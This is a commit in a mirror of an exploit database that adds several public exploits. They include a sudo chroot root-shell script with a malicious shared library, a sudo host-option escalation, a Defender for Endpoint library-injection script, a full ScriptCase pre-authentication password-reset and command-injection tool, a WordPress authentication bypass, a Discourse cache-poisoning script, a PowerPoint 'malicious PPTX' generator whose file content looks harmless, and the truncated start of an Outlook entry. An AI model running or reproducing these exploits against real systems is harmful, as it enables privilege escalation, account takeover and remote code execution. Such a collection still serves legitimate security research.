bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Merge remote-tracking branch 'exploitdb/main'

Browse source
This commit is contained in:
Brendan McDevitt 2025-07-10 00:01:54 +00:00
commit 99e10e9ba8
9 changed files with 1302 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

98
exploits/linux/local/52352.txt Normal file
View file

@ -0,0 +1,98 @@
Exploit Title: Sudo chroot 1.9.17 - Local Privilege Escalation
Google Dork: not aplicable
Date: Mon, 30 Jun 2025
Exploit Author: Stratascale
Vendor Homepage:https://salsa.debian.org/sudo-team/sudo
Software Link:
Version: Sudo versions 1.9.14 to 1.9.17 inclusive
Tested on: Kali Rolling 2025-7-3
CVE : CVE-2025-32463
*Version running today in Kali:*
https://pkg.kali.org/news/640802/sudo-1916p2-2-imported-into-kali-rolling/
*Background*
An attacker can leverage sudo's -R (--chroot) option to run
arbitrary commands as root, even if they are not listed in the
sudoers file.
Sudo versions affected:
Sudo versions 1.9.14 to 1.9.17 inclusive are affected.
CVE ID:
This vulnerability has been assigned CVE-2025-32463 in the
Common Vulnerabilities and Exposures database.
Details:
Sudo's -R (--chroot) option is intended to allow the user to
run a command with a user-selected root directory if the sudoers
file allows it. A change was made in sudo 1.9.14 to resolve
paths via chroot() using the user-specified root directory while
the sudoers file was still being evaluated. It is possible for
an attacker to trick sudo into loading an arbitrary shared
library by creating an /etc/nsswitch.conf file under the
user-specified root directory.
The change from sudo 1.9.14 has been reverted in sudo 1.9.17p1
and the chroot feature has been marked as deprecated. It will
be removed entirely in a future sudo release. Because of the
way sudo resolves commands, supporting a user-specified chroot
directory is error-prone and this feature does not appear to
be widely used.
A more detailed description of the bug and its effects can be
found in the Stratascale advisory:
https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot
Impact:
On systems that support /etc/nsswitch.conf a user may be able
to run arbitrary commands as root.
*Exploit:*
*Verify the sudo version running: sudo --versionIf is vulnerable, copy and
paste the following code and run it.*
*----------------------*
#!/bin/bash
# sudo-chwoot.sh PoC CVE-2025-32463
set -e
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd "$STAGE"
# 1. NSS library
cat > woot1337.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor))
void woot(void) {
setreuid(0,0); /* change to UID 0 */
setregid(0,0); /* change to GID 0 */
chdir("/"); /* exit from chroot */
execl("/bin/bash","/bin/bash",NULL); /* root shell */
}
EOF
# 2. Mini chroot with toxic nsswitch.conf
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc # make getgrnam() not fail
# 3. compile libnss_
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
echo "[*] Running exploit…"
sudo -R woot woot # (-R <dir> <cmd>)
# • the first “woot” is chroot
# • the second “woot” is and inexistent
command
# (only needs resolve the user)
rm -rf "$STAGE"
*----------------------*

60
exploits/linux/local/52354.txt Normal file
View file

@ -0,0 +1,60 @@
# Exploit Title: Sudo 1.9.17 Host Option - Elevation of Privilege
# Date: 2025-06-30
# Exploit Author: Rich Mirch
# Vendor Homepage: https://www.sudo.ws
# Software Link: https://www.sudo.ws/dist/sudo-1.9.17.tar.gz
# Version: Stable 1.9.0 - 1.9.17, Legacy 1.8.8 - 1.8.32
# Fixed in: 1.9.17p1
# Vendor Advisory: https://www.sudo.ws/security/advisories/host_any
# Blog:
https://www.stratascale.com/vulnerability-alert-CVE-2025-32462-sudo-host
# Tested on: Ubuntu 24.04.1; Sudo 1.9.15p5, macOS Sequoia 15.3.2; Sudo
1.9.13p2
# CVE : CVE-2025-32462
#
No exploit is required. Executing a sudo or sudoedit command with the host
option referencing an unrelated remote host rule causes Sudo to treat the
rule as valid for the local system. As a result, any command allowed by the
remote host rule can be executed on the local machine.
Example /etc/sudoers file using the Host_Alias directive. The lowpriv user
is allowed to execute all commands (full root) on dev.test.local,
ci.test.local, but not prod.test.local.
Host_Alias SERVERS = prod.test.local, dev.test.local
Host_Alias PROD = prod.test.local
lowpriv SERVERS, !PROD = NOPASSWD:ALL
lowpriv ci.test.local = NOPASSWD:ALL
Even though the prod.test.local server is explicitly denied for the lowpriv
user, root access is achieved by specifying the host option for the
dev.test.local or ci.test.local servers.
Example
Show that lowpriv is not allowed to execute sudo on the prod server.
lowpriv@prod:~$ id
uid=1001(lowpriv) gid=1001(lowpriv) groups=1001(lowpriv)
lowpriv@prod:~$ sudo -l
[sudo] password for lowpriv:
Sorry, user lowpriv may not run sudo on prod.
List the host rules for the dev.test.local server.
lowpriv@prod:~$ sudo -l -h dev.test.local
Matching Defaults entries for lowpriv on dev:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User lowpriv may run the following commands on dev:
(root) NOPASSWD: ALL
Execute a root shell on prod.test.local by specifying the -h dev.test.local
option.
lowpriv@prod:~$ sudo -h dev.test.local -i
sudo: a remote host may only be specified when listing privileges.
root@prod:~# id
uid=0(root) gid=0(root) groups=0(root)

78
exploits/multiple/local/52355.txt Normal file
View file

@ -0,0 +1,78 @@
#!/bin/bash
# Exploit Title: Microsoft Defender for Endpoint (MDE) - Elevation of Privilege
# Date: 2025-05-27
# Exploit Author: Rich Mirch
# Vendor Homepage: https://learn.microsoft.com/en-us/defender-endpoint/
# Software Link:
https://learn.microsoft.com/en-us/defender-endpoint/microsoft-defender-endpoint-linux
# Versions:
# Vulnerable March-2025 Build: 101.25012.0000 30.125012.0000.0
# Vulnerable Feb-2025 Build: 101.24122.0008 20.124112.0008.0
# Vulnerable Feb-2025 Build: 101.24112.0003 30.124112.0003.0
# Vulnerable Jan-2025 Build: 101.24112.0001 30.124112.0001.0
# Vulnerable Jan-2025 Build: 101.24102.0000 30.124102.0000.0
#
# Vendor Advisory:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47161
# Blog: http://stratascale.com/vulnerability-alert-cve202547161
# Tested on: Ubuntu 24.04.1 LTS and 24.04.2 LTS
# CVE : CVE-2025-47161
#
echo "MDE Version: $(mdatp version)"
# stage
cat >mde-exp.c<<EOF
/*
* Build procedure:
* gcc -fPIC -o woot.o -Wall -c woot.c
* gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o
*/
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
void woot(){
// for manual testing
if(isatty(STDERR_FILENO)) {
fprintf(stderr,"Woot!\n");
}
system("ps -ef > /woot.txt");
sleep(3000000);
}
EOF
# build exploit
gcc -fPIC -o woot.o -Wall -c mde-exp.c
gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o
mkdir -p /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/
cat > /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/openssl.cnf
<<EOF
# Malicious openssl.cnf
openssl_conf = openssl_init
[openssl_init]
engines = engine_section
[engine_section]
woot = woot_section
[woot_section]
engine_id = woot
dynamic_path = /tmp/woot.so
init = 0
EOF
echo "Checking every 15 seconds for /woot.txt"
while true
do
if [[ -f /woot.txt ]]
then
echo "WOOT - /woot.txt exists"
ls -ld /woot.txt
exit
fi
sleep 15
done

330
exploits/multiple/remote/52353.py Executable file
View file

@ -0,0 +1,330 @@
# Exploit Title: ScriptCase 9.12.006 (23) - Remote Command Execution (RCE)
# Date: 04/07/2025
# Exploit Author: Alexandre ZANNI (noraj) & Alexandre DROULLÉ (cabir)
# Vendor Homepage: https://www.scriptcase.net/
# Software Link: https://www.scriptcase.net/download/
# Version: 1.0.003-build-2 (Production Environment) / 9.12.006 (23) (ScriptCase)
# Tested on: EndeavourOS
# CVE : CVE-2025-47227, CVE-2025-47228
# Source: https://github.com/synacktiv/CVE-2025-47227_CVE-2025-47228
# Advisory: https://www.synacktiv.com/advisories/scriptcase-pre-authenticated-remote-command-execution
# Imports
## stdlib
import io
import random
import optparse
import re
import string
import sys
import urllib.parse
## third party
from PIL import Image, ImageEnhance, ImageFilter # pip3 install Pillow
import pytesseract # pip3 install pytesseract
import requests # pip install requests
from bs4 import BeautifulSoup # pip install beautifulsoup4
# Clean image + OCR
def process_image(input_image, output_image_path=None):
# Open the image
img = Image.open(io.BytesIO(input_image))
# Convert the image to RGB (in case it's in a different mode)
img = img.convert('RGB')
# Load the pixel data
pixels = img.load()
# Get the dimensions of the image
width, height = img.size
# Process each pixel
for y in range(height):
for x in range(width):
r, g, b = pixels[x, y]
# Change the crap background to a fixed color (letters are only black or white, and background is random color but not black or white)
if (r, g, b) != (0, 0, 0) and (r, g, b) != (255, 255, 255):
pixels[x, y] = (211, 211, 211) # Change the pixel to light grey
elif (r, g, b) == (255, 255, 255): # Change white text in black text
pixels[x, y] = (0, 0, 0) # Change the pixel to black
# Size (200, 50) * 5
img = img.resize((1000,250), Image.Resampling.HAMMING)
# Use Tesseract to convert the image to text
# psm 6 or 8 work best
# limit alphabet
# disable word optimized detection https://github.com/tesseract-ocr/tessdoc/blob/main/ImproveQuality.md#dictionaries-word-lists-and-patterns
custom_oem_psm_config = rf'--psm 8 --oem 3 -c tessedit_char_whitelist={string.ascii_letters} -c load_system_dawg=false -c load_freq_dawg=false --dpi 300' # there are only uppercase but keep lowercase to avoid false negative
text = pytesseract.image_to_string(img, config=custom_oem_psm_config)
return(text.upper().strip()) # convert false positive lowercase to uppercase, strip because leading whitespace is often added
# Step 1: Set is_page to true on the session
def prepare_session(url_base, cookies):
res = requests.get(
f'{url_base}/prod/lib/php/devel/iface/login.php',
cookies=cookies,
verify=False
)
if res.status_code == 200:
print("[+] Session prepared")
else:
print(f"[-] Failed with status code {res.status_code}")
# Random hex string of arbitrary size
def rand_hex(size):
return ''.join(random.choice('0123456789abcdef') for _ in range(size))
# Step 2: Get a captcha challenge for the session
def captcha_session(url_base, cookies):
res = requests.get(
f'{url_base}/prod/lib/php/devel/lib/php/secureimage.php',
cookies=cookies,
verify=False
)
if res.status_code == 200:
print("[+] Captcha retrieved")
return res.content
else:
print(f"[-] Failed with status code {res.status_code}")
# Step 3: Change the password with the prepared session
def reset_password(url_base, cookies, captcha_img, captcha_txt):
new_password = random.choice(string.ascii_letters).capitalize() + rand_hex(10) + str(random.randint(0,9))
email = f'{rand_hex(10)}@{rand_hex(8)}.com'
data = {
'ajax': 'nm',
'nm_action': 'change_pass',
'email': email,
'pass_new': new_password,
'pass_conf': new_password,
'lang': 'en-us',
'captcha': captcha_txt
}
res = requests.post(
f'{url_base}/prod/lib/php/devel/iface/login.php',
data=data,
cookies=cookies,
verify=False
)
if res.status_code == 200 and res.text == '{"result":"success"}':
print("[+] Password reset successfully")
print(f"[+] The new password is: {new_password}")
print(f"[+] The delcared (fake) email address was: {email}")
elif res.status_code == 200 and res.text == '{"result":"error","message":"Invalid captcha"}':
print("[-] OCR failed")
print(f"[-] Failed captcha submission was {captcha_txt}")
img = Image.open(io.BytesIO(captcha_img))
img.show()
manual_input = input("[+] Input displayed captcha to retry manually: ")
reset_password(url_base, cookies, captcha_img, manual_input)
elif res.status_code == 200 and res.text == '{"result":"error","message":"The password is incorrect."}':
print("[-] Non default password policy")
print("[-] Hardcode a password that matches it")
print(f"[-] Failed password is: {new_password}")
else:
print(f"[-] Failed with status code {res.status_code}")
print(res.text)
print('[-] Data was:')
print(data)
# Detect the deployment path of ScriptCase and produciton environment from the homepage.
# E.g. deployment path is /scriptcase/
# sc_pathToTB variable on http://10.58.8.213/ will be '/scriptcase/prod/third/jquery_plugin/thickbox/'
# ScriptCase login page => http://10.58.8.213/scriptcase/devel/iface/login.php
# Production Environment login page => http://10.58.8.213/scriptcase/prod/lib/php/devel/iface/login.php
def detect_deployment_path(homepage_url):
res = requests.get(homepage_url, verify=False) # HTTP redirections are handled automatically (not JS redirects)
if res.status_code == 200:
print("[+] Looking for deployment path in JS and computing login paths")
reg = r"var sc_pathToTB = '(.+)/prod/third/jquery_plugin/thickbox/';"
match = re.search(reg, res.text)
# compute URL without path
parsed_url = urllib.parse.urlparse(homepage_url)
homepage_root = f"{parsed_url.scheme}://{parsed_url.netloc}"
if match:
base_path = match.group(1)
print(f"[+] Deployment path found: {base_path}/")
print(f"[+] ScriptCase login page: {homepage_root}{base_path}/devel/iface/login.php (probably not deployed on a production environment)")
print(f"[+] Production Environment login page: {homepage_root}{base_path}/prod/lib/php/devel/iface/login.php")
else: # either a website not made with ScriptCase or root redirects to the devel page
js_redirect(res)
# try to detect the devel/iface/login.php page
reg2 = r'http://www\.scriptcase\.net|doChangeLanguage|str_lang_user_first'
match = re.search(reg2, res.text)
if match: # devel page
print(f"[?] This may be the development console?")
# now try to extract path from favicon
reg3 = r'<link rel="shortcut icon" href="(.+)/devel/conf/scriptcase/img/ico/favicon\.ico"'
match = re.search(reg3, res.text)
if match: # base path found
base_path = match.group(1)
print(f"[+] Deployment path found: {base_path}/")
print(f"[+] ScriptCase login page: {homepage_root}{base_path}/devel/iface/login.php")
print(f"[+] Production Environment login page: {homepage_root}{base_path}/prod/lib/php/devel/iface/login.php")
else: # false positive, it's not devel page
print(f"[-] Failed to find deployment path, is this site made with ScriptCase?")
else: # no ScriptCase detected
print("[-] Failed to find deployment path, is this site made with ScriptCase?")
else:
print(f"[-] Failed with status code {res.status_code}")
# Try to handle JS redirect else warn and exit
def js_redirect(res):
if re.search(r'window\.location', res.text):
print('[-] JavaScript redirection detected')
print('[-] JavaScript redirection not handled (no headless browser with JS engine)')
print(f"[-] Returned page is:\n{res.text}")
print(f"[-] Last redirection URL is:\n{res.url}")
match = re.search(r"window\.location\s*=\s*['\"](.+)['\"]", res.text)
if match:
redirect_url = f"{res.url}/{match.group(1)}"
print(f"[?] Let's try again with: {redirect_url}")
detect_deployment_path(redirect_url)
else:
print('Please try again with redirect URL')
exit(1)
# Remote command execution on the system
#
# Instead of registering a new connection (admin_sys_allconections_create_wizard.php), we can just test it
# (admin_sys_allconections_test.php) so we leave less traces.
# Even if the test results in "Connection Error" / "Unable to connect", the command was stil lexecuted.
def command_injection(url_base, cookies, cmd):
data = {
'hid_create_connect': 'S',
'dbms': 'mysql',
'conn': 'conn_mysql',
'dbms': 'pdo_mysql',
'host': '127.0.0.1:3306',
'server': '127.0.0.1',
'port': '3306',
'user': rand_hex(11),
'pass': rand_hex(8),
'show_table': 'Y',
'show_view': 'Y',
'show_system': 'Y',
'show_procedure': 'Y',
'decimal': '.',
'use_persistent': 'N',
'use_schema': 'N',
'retrieve_schema': 'Y',
'retrieve_schema': 'Y',
'use_ssh': 'Y',
'ssh_server': '127.0.0.1',
'ssh_user': 'root',
'ssh_port': '22',
'ssh_localportforwarding': f'; {cmd};#',
'ssh_localserver': '127.0.0.1',
'ssh_localport': '3306',
'form_create': form_create(url_base, cookies),
'retornar': 'Back',
'concluir': 'Save',
'confirmar': 'Back',
'voltar': 'Confirm',
'step': 'sgdb2',
'nextstep': 'dados_rep'
}
res = requests.post(
f'{url_base}/prod/lib/php/devel/iface/admin_sys_allconections_test.php',
data=data,
cookies=cookies,
verify=False
)
if res.status_code == 200:
print("[+] Command executed (blind)")
else:
print(f"[-] Failed with status code {res.status_code}")
exit(1)
# Get form_create ID for command_injection()
def form_create(url_base, cookies):
res = requests.get(
f'{url_base}/prod/lib/php/devel/iface/admin_sys_allconections_create_wizard.php',
cookies=cookies,
verify=False
)
if res.status_code == 200:
print("[+] Parsing results to find form_create ID")
soup = BeautifulSoup(res.text, 'html.parser')
form_create = soup.css.select_one('html body.nmPage form input[name="form_create"]')
if form_create:
form_create_id = form_create.get('value')
print(f"[+] form_create ID found: {form_create_id}")
return form_create_id
else:
print("[-] No form_create ID found")
exit(1)
return res.content
else:
print(f"[-] Failed with status code {res.status_code}")
exit(1)
# Handles login
#
# Comes with a cookie as there is session fixation (cookie not renewed after login)
def login(url_base, cookies, password):
data = {
'option': 'login',
'opt_par': None,
'hid_login': 'S',
'field_pass': password,
'field_language': 'en-us'
}
res = requests.post(
f'{url_base}/prod/lib/php/nm_ini_manager2.php',
data=data,
cookies=cookies,
verify=False
)
if res.status_code == 200:
print("[+] Authentication successful")
else:
print("[-] Authentication failed")
# Exploit
if __name__ == '__main__':
help_text = """
Examples:
Pre-Auth RCE (password reset + RCE)
python exploit.py -u http://example.org/scriptcase -c "command"
Password reset only (no auth)
python exploit.py -u http://example.org/scriptcase
RCE only (need account)
python exploit.py -u http://example.org/scriptcase -c "command" -p 'Password123*'
Detect deployment path
python exploit.py -u http://example.org/ -d
"""
parser = optparse.OptionParser(usage=help_text)
parser.add_option('-u', '--base-url')
parser.add_option('-c', '--command')
parser.add_option('-p', '--password')
parser.add_option('-d', '--detect', action='store_true', dest='detect')
opts, args = parser.parse_args()
cookies = {
'PHPSESSID': rand_hex(26) # Simulate a random PHPSESSID (more stealth than an arbitrary string)
}
URL_BASE = opts.base_url
if opts.base_url and opts.command and not opts.password and not opts.detect: # Pre-Auth RCE (password reset + RCE)
prepare_session(URL_BASE, cookies)
captcha_img = captcha_session(URL_BASE, cookies)
captcha_txt = process_image(captcha_img)
reset_password(URL_BASE, cookies, captcha_img, captcha_txt)
command_injection(URL_BASE, cookies, opts.command)
elif opts.base_url and not opts.command and not opts.password and not opts.detect: # Password reset only (no auth)
prepare_session(URL_BASE, cookies)
captcha_img = captcha_session(URL_BASE, cookies)
captcha_txt = process_image(captcha_img)
reset_password(URL_BASE, cookies, captcha_img, captcha_txt)
elif opts.base_url and opts.command and opts.password and not opts.detect: # RCE only (need account)
prepare_session(URL_BASE, cookies)
login(URL_BASE, cookies, opts.password)
command_injection(URL_BASE, cookies, opts.command)
elif opts.base_url and not opts.command and not opts.password and opts.detect: # Detect deployment path
detect_deployment_path(URL_BASE)
else:
parser.print_help()
sys.exit(1)

17
exploits/multiple/webapps/52357.txt Normal file
View file

@ -0,0 +1,17 @@
# Exploit Title: Stacks Mobile App Builder 5.2.3 - Authentication Bypass via Account Takeover
# Date: October 25, 2024
# Exploit Author: stealthcopter
# Vendor Homepage: https://stacksmarket.co/
# Software Link: https://wordpress.org/plugins/stacks-mobile-app-builder/
# Version: <= 5.2.3
# Tested on: Ubuntu 24.10/Docker
# CVE: CVE-2024-50477
# References:
# - https://github.com/stealthcopter/wordpress-hacking/blob/main/reports/stacks-mobile-app-builder-priv-esc/stacks-mobile-app-builder-priv-esc.md
# - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stacks-mobile-app-builder/stacks-mobile-app-builder-523-authentication-bypass-via-account-takeover
1. Navigate to the target site and append the following query parameters to the URL to impersonate the user with ID `1`:
`/?mobile_co=1&uid=1`
2. You will now receive an authentication cookie for the specified user ID (typically, user ID `1` is the site administrator).
3. Visit `/wp-admin` — you should have full access to the admin dashboard.

248
exploits/multiple/webapps/52358.py Executable file
View file

@ -0,0 +1,248 @@
#!/usr/bin/env python3
"""
Exploit Title: Discourse 3.2.x - Anonymous Cache Poisoning
Date: 2024-10-15
Exploit Author: ibrahimsql
Github: : https://github.com/ibrahmsql
Vendor Homepage: https://discourse.org
Software Link: https://github.com/discourse/discourse
Version: Discourse < latest (patched)
Tested on: Discourse 3.1.x, 3.2.x
CVE: CVE-2024-47773
CVSS: 7.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L)
Description:
Discourse anonymous cache poisoning vulnerability allows attackers to poison
the cache with responses without preloaded data through multiple XHR requests.
This affects only anonymous visitors of the site.
Reference:
https://nvd.nist.gov/vuln/detail/CVE-2024-47773
"""
import requests
import sys
import argparse
import time
import threading
import json
from urllib.parse import urljoin
class DiscourseCachePoisoning:
def __init__(self, target_url, threads=10, timeout=10):
self.target_url = target_url.rstrip('/')
self.threads = threads
self.timeout = timeout
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'X-Requested-With': 'XMLHttpRequest'
})
self.poisoned = False
def check_target(self):
"""Check if target is accessible and running Discourse"""
try:
response = self.session.get(f"{self.target_url}/", timeout=self.timeout)
if response.status_code == 200:
if 'discourse' in response.text.lower() or 'data-discourse-setup' in response.text:
return True
except Exception as e:
print(f"[-] Error checking target: {e}")
return False
def check_anonymous_cache(self):
"""Check if anonymous cache is enabled"""
try:
# Test endpoint that should be cached for anonymous users
response = self.session.get(f"{self.target_url}/categories.json", timeout=self.timeout)
# Check cache headers
cache_headers = ['cache-control', 'etag', 'last-modified']
has_cache = any(header in response.headers for header in cache_headers)
if has_cache:
print("[+] Anonymous cache appears to be enabled")
return True
else:
print("[-] Anonymous cache may be disabled")
return False
except Exception as e:
print(f"[-] Error checking cache: {e}")
return False
def poison_cache_worker(self, endpoint):
"""Worker function for cache poisoning attempts"""
try:
# Create session without cookies to simulate anonymous user
anon_session = requests.Session()
anon_session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'X-Requested-With': 'XMLHttpRequest'
})
# Make rapid requests to poison cache
for i in range(50):
response = anon_session.get(
f"{self.target_url}{endpoint}",
timeout=self.timeout
)
# Check if response lacks preloaded data
if response.status_code == 200:
try:
data = response.json()
# Check for missing preloaded data indicators
if self.is_poisoned_response(data):
print(f"[+] Cache poisoning successful on {endpoint}")
self.poisoned = True
return True
except:
pass
time.sleep(0.1)
except Exception as e:
pass
return False
def is_poisoned_response(self, data):
"""Check if response indicates successful cache poisoning"""
# Look for indicators of missing preloaded data
indicators = [
# Missing or empty preloaded data
not data.get('preloaded', True),
data.get('preloaded') == {},
# Missing expected fields
'categories' in data and not data['categories'],
'topics' in data and not data['topics'],
# Error indicators
data.get('error') is not None,
data.get('errors') is not None
]
return any(indicators)
def test_cache_poisoning(self):
"""Test cache poisoning on multiple endpoints"""
print("[*] Testing cache poisoning vulnerability...")
# Target endpoints that are commonly cached
endpoints = [
'/categories.json',
'/latest.json',
'/top.json',
'/c/general.json',
'/site.json',
'/site/basic-info.json'
]
threads = []
for endpoint in endpoints:
print(f"[*] Testing endpoint: {endpoint}")
# Create multiple threads to poison cache
for i in range(self.threads):
thread = threading.Thread(
target=self.poison_cache_worker,
args=(endpoint,)
)
threads.append(thread)
thread.start()
# Wait for threads to complete
for thread in threads:
thread.join(timeout=5)
if self.poisoned:
break
time.sleep(1)
return self.poisoned
def verify_poisoning(self):
"""Verify if cache poisoning was successful"""
print("[*] Verifying cache poisoning...")
# Test with fresh anonymous session
verify_session = requests.Session()
verify_session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
})
try:
response = verify_session.get(f"{self.target_url}/categories.json", timeout=self.timeout)
if response.status_code == 200:
try:
data = response.json()
if self.is_poisoned_response(data):
print("[+] Cache poisoning verified - anonymous users affected")
return True
else:
print("[-] Cache poisoning not verified")
except:
print("[-] Unable to parse response")
else:
print(f"[-] Unexpected response code: {response.status_code}")
except Exception as e:
print(f"[-] Error verifying poisoning: {e}")
return False
def exploit(self):
"""Main exploit function"""
print(f"[*] Testing Discourse Cache Poisoning (CVE-2024-47773)")
print(f"[*] Target: {self.target_url}")
if not self.check_target():
print("[-] Target is not accessible or not running Discourse")
return False
print("[+] Target confirmed as Discourse instance")
if not self.check_anonymous_cache():
print("[-] Anonymous cache may be disabled (DISCOURSE_DISABLE_ANON_CACHE set)")
print("[*] Continuing with exploit attempt...")
success = self.test_cache_poisoning()
if success:
print("[+] Cache poisoning attack successful!")
self.verify_poisoning()
print("\n[!] Impact: Anonymous visitors may receive responses without preloaded data")
print("[!] Recommendation: Upgrade Discourse or set DISCOURSE_DISABLE_ANON_CACHE")
return True
else:
print("[-] Cache poisoning attack failed")
print("[*] Target may be patched or cache disabled")
return False
def main():
parser = argparse.ArgumentParser(description='Discourse Anonymous Cache Poisoning (CVE-2024-47773)')
parser.add_argument('-u', '--url', required=True, help='Target Discourse URL')
parser.add_argument('-t', '--threads', type=int, default=10, help='Number of threads (default: 10)')
parser.add_argument('--timeout', type=int, default=10, help='Request timeout (default: 10)')
args = parser.parse_args()
exploit = DiscourseCachePoisoning(args.url, args.threads, args.timeout)
try:
success = exploit.exploit()
sys.exit(0 if success else 1)
except KeyboardInterrupt:
print("\n[-] Exploit interrupted by user")
sys.exit(1)
except Exception as e:
print(f"[-] Exploit failed: {e}")
sys.exit(1)
if __name__ == '__main__':
main()

122
exploits/windows/remote/52351.py Executable file
View file

@ -0,0 +1,122 @@
#!/usr/bin/env python3
# Exploit Title: Microsoft PowerPoint 2019 - Remote Code Execution (RCE)
# Author: Mohammed Idrees Banyamer
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Date: 2025-07-02
# Tested on: Microsoft PowerPoint 2019 / Office 365 (version before June 2025 Patch)
# CVE: CVE-2025-47175
# Type: Use-After-Free (UAF) Remote Code Execution (local user required)
# Platform: Windows (PowerPoint)
# Author Country: Jordan
# Attack Vector: Local (User must open crafted PPTX file)
# Description:
# This exploit leverages a Use-After-Free vulnerability in Microsoft PowerPoint
# allowing an attacker to execute arbitrary code by tricking a user into opening
# a specially crafted PPTX file. This PoC generates such a malicious PPTX file
# designed to trigger the UAF condition.
#
# Steps of exploitation:
# 1. Run this script to generate the malicious PPTX file.
# 2. Send or trick the target user to open this file in a vulnerable PowerPoint version.
# 3. Exploit triggers upon opening the file, leading to possible code execution.
#
# Note: This PoC creates a simplified PPTX file structure with crafted XML designed
# to trigger the vulnerability. For a full exploit, further memory manipulation and shellcode injection
# are required (not included here).
#
# Affected Versions:
# Microsoft PowerPoint versions prior to June 2025 patch (KB5002689)
#
# Usage:
# python3 exploit_cve2025_47175.py [options]
#
# Options:
# -o, --output Output PPTX filename (default: exploit_cve_2025_47175.pptx)
# -i, --id Shape ID (default: 1234)
# -n, --name Shape Name (default: MaliciousShape)
# -t, --text Trigger text inside the slide (default: explanation message)
#
# Example:
# python3 exploit_cve2025_47175.py -o evil.pptx -i 5678 -n "BadShape" -t "Triggering CVE-2025-47175 now!"
import zipfile
import sys
import argparse
def create_exploit_pptx(filename, shape_id, shape_name, trigger_text):
slide_xml = f'''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"
xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
<p:cSld>
<p:spTree>
<p:sp>
<p:nvSpPr>
<p:cNvPr id="{shape_id}" name="{shape_name}"/>
<p:cNvSpPr/>
<p:nvPr/>
</p:nvSpPr>
<p:spPr/>
<p:txBody>
<a:bodyPr/>
<a:lstStyle/>
<a:p>
<a:r>
<a:t>{trigger_text}</a:t>
</a:r>
</a:p>
</p:txBody>
</p:sp>
</p:spTree>
</p:cSld>
</p:sld>'''
try:
with zipfile.ZipFile(filename, 'w') as z:
z.writestr('[Content_Types].xml',
'''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
<Default Extension="xml" ContentType="application/xml"/>
<Override PartName="/ppt/slides/slide1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
</Types>''')
z.writestr('ppt/_rels/presentation.xml.rels',
'''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide1.xml"/>
</Relationships>''')
z.writestr('ppt/presentation.xml',
'''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:presentation xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"
xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
<p:sldIdLst>
<p:sldId id="256" r:id="rId1"/>
</p:sldIdLst>
<p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
</p:presentation>''')
z.writestr('ppt/slides/slide1.xml', slide_xml)
print(f"[+] Malicious PPTX file '{filename}' created successfully.")
print("[*] Deliver this file to the victim and wait for them to open it in vulnerable PowerPoint.")
except Exception as e:
print(f"[-] Error: {e}", file=sys.stderr)
sys.exit(1)
def main():
parser = argparse.ArgumentParser(description='Exploit generator for CVE-2025-47175 (PowerPoint UAF)')
parser.add_argument('-o', '--output', type=str, default='exploit_cve_2025_47175.pptx',
help='Output PPTX filename (default: exploit_cve_2025_47175.pptx)')
parser.add_argument('-i', '--id', type=int, default=1234,
help='Shape ID (default: 1234)')
parser.add_argument('-n', '--name', type=str, default='MaliciousShape',
help='Shape Name (default: MaliciousShape)')
parser.add_argument('-t', '--text', type=str, default='This content triggers CVE-2025-47175 UAF vulnerability.',
help='Trigger text inside the slide (default: explanation message)')
args = parser.parse_args()
create_exploit_pptx(args.output, args.id, args.name, args.text)
if __name__ == "__main__":
main()

341
exploits/windows/remote/52356.txt Normal file
View file

@ -0,0 +1,341 @@
# Titles: Microsoft Outlook - Remote Code Execution (RCE)
# Author: nu11secur1ty
# Date: 07/06/2025
# Vendor: Microsoft
# Software: https://www.microsoft.com/en-us/microsoft-365/outlook/log-in
# Reference:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47176 >
https://www.cloudflare.com/learning/security/what-is-remote-code-execution/
# CVE-2025-47176
## Description
This proof-of-concept (PoC) demonstrates the CVE-2025-47176 vulnerability
simulation. It injects a crafted mail item into Outlook containing a
malicious sync path that triggers an action during scanning.
**IMPORTANT:**
